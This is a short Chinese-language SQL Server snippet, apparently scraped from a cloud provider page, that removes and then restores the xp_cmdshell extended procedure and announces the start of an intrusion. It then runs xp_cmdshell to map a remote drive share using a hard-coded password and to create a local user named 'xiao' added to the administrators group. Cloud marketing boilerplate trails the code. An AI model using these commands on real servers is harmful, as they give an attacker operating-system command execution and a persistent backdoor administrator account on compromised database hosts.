--查詢此過程的dll
sp_helpextendedproc xp_cmdshell
刪除相關控制台命令
--刪除xp_cmdshell控制台
EXEC sp_dropextendedproc 'xp_cmdshell'
--刪除sp_addextendedproc增益集函數
DROP PROCEDURE sp_addextendedproc
附加回相關控制台命令
--恢複sp_addextendedproc增益集函數
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
--恢複xp_cmdshell控制台
EXEC sp_addextendedproc 'xp_cmdshell' ,'xplog70.dll'
--dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 備用恢複xp_cmdshell控制台,這樣可以直接恢複,不用去管sp_addextendedproc是不是存在
準備工作做好後,開始入侵
exec master..xp_cmdshell
--'net use z: \\192.168.2.206\F$ "barefoot321+-*" /user:192.168.2.206\barefootadmin' --添加一個影射
'net user xiao xiao /add & net localgroup administrators xiao /add' --添加一個進階管理使用者
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
